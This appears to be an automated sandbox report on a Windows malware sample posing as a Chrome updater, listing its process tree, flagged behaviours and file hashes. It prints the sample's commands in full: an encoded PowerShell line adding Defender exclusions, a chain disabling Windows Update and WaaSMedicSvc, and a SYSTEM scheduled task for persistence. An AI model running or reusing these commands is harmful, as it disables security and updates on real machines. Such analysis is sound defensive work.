- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s FontCache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe"C:\Users\Admin\AppData\Local\Temp\7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
-
C:\Windows\system32\sc.exesc stop bits5⤵
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""5⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f5⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe4⤵
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exeC:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\sc.exesc stop wuauserv8⤵
-
C:\Windows\system32\sc.exesc stop bits8⤵
-
C:\Windows\system32\sc.exesc stop dosvc8⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc8⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc8⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""8⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f8⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f8⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f8⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f8⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f8⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 07⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 08⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 08⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 08⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 08⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe7⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "fuljhipnixrs"8⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3772 -s 7842⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3792 -s 8562⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3792 -s 8362⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6E1.tmp.csvFilesize
32KB
MD5a97ad4686eed9bc1d95292d265a260e7
SHA1be1ab1a2293d499360e81192a6b6ebd5f295b9ef
SHA2560ed3164814690f3bc48097ac1acf1d4b415ec1a17d66953943a37a76e263796f
SHA5120c293e24f61f308e342427744a13e5337905c3d77fb9cee57b398b2e09379447c06446e6b801e14d340be94b3f77153478642d157475b039a7c50c5e0c4263b8
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB730.tmp.txtFilesize
12KB
MD561ea15241eb56c73f694d1c579330754
SHA1ea1322b583cd78a7b67093f2af4f9b5c2cd0fcd0
SHA256ed18bdbd15c560dec0b888f8cfdeec4b9c329b5d02d339333c52cb7e1404bfb6
SHA5121fd464bca30346d6a6b1445aa56225ad1700d90d403c5a4b85d175681c540288b350e6d4521a52ba49c22e73794b203f9647d7111105abc4f16ca1737b337d89
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9C1.tmp.csvFilesize
31KB
MD5ead8c4998e3c2b6c5a8476f88007d2af
SHA1f8afaf888711f0a3f7241a01a79ed2cccea60628
SHA256082ae65398aaaa6b9a9fc8ceff6f6550737bf60ee61cc1bb0fccd1d08ba54b49
SHA512b4fdaa9e0adc0ed357f11b9e35183e8e906b5c6df9f0a1c5dabd61975facdf4ced62548cdc827cb515903c26b5f46eeee26909ba0e590c904b3d2394837570b2
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9E2.tmp.txtFilesize
12KB
MD5370bf58b111b6a8b30975ab09e0bbb8f
SHA159a6327d040bdbde89da7dd65bb76c59da60704f
SHA2562d15af30a8d755a85d7d0edeaa65bdc755468eec1a59048cf4f4966624d79ce0
SHA512a16dd07cb5f2de7d15161a4f6b0c888a0b470231bd33a8c5452223ce915934376f8e535a3e5cdd67157e7380fe77fba8a2d608d3d1d54dc2b366fed102d67461
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
539B
MD5f45d46b20b2f149cd2cfba6b1bd00f5f
SHA15e98894e4fdba7142eeb7c6634d5eeb110acb594
SHA256457a1ba49a120abd7d7ff591e0c9cd4e68fbe5fd6bfb0c7a57a909885bf631cd
SHA51288739f65b1dd634b6e0ec6f7183951d5b67ed2be23fefeef408b69a5b2c73116c4102daa9f19ef5fab1e2dcccec8869cf87f5b0dc525646fce9103743325b68c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD509a88f3f2b526978a733f3764afbb173
SHA1315190bc3d44fb1e5ea95103bb733338393c1fa5
SHA2568decc74a9bcd839cb54ae144809ccbab534ebcfe6e308e2de39102dd891c69e2
SHA5129e7a2f685b8b5259d4f228e9496261bc2cf38d4e2a255d0f35ce6ad8b060a4f31a7681db2c6ca77a6e79479d106b6c885de95820c44b6a8ba57751a788839c08
-
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exeFilesize
2.2MB
MD540caa9b00badca24594571e157a6d2a9
SHA142f2faf2aa59f38c16824eaa1dc022fddb142565
SHA2567b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442
SHA512e8517ff311d81efe14707629f1730ca329db66b92d17ff711945ec5a0313de3cc914d59fd621bfcb907750b0947778784da191c0c6d703c92f788e61dc5e34d3
-
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exeFilesize
2.2MB
MD540caa9b00badca24594571e157a6d2a9
SHA142f2faf2aa59f38c16824eaa1dc022fddb142565
SHA2567b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442
SHA512e8517ff311d81efe14707629f1730ca329db66b92d17ff711945ec5a0313de3cc914d59fd621bfcb907750b0947778784da191c0c6d703c92f788e61dc5e34d3
-
memory/60-196-0x0000000000000000-mapping.dmp
-
memory/356-255-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/356-309-0x0000021E379D0000-0x0000021E379FA000-memory.dmpFilesize
168KB
-
memory/412-226-0x0000000000000000-mapping.dmp
-
memory/504-314-0x0000017AD0DB0000-0x0000017AD0DDA000-memory.dmpFilesize
168KB
-
memory/504-256-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/576-299-0x000002024CEA0000-0x000002024CECA000-memory.dmpFilesize
168KB
-
memory/576-252-0x000002024CE70000-0x000002024CE93000-memory.dmpFilesize
140KB
-
memory/576-247-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
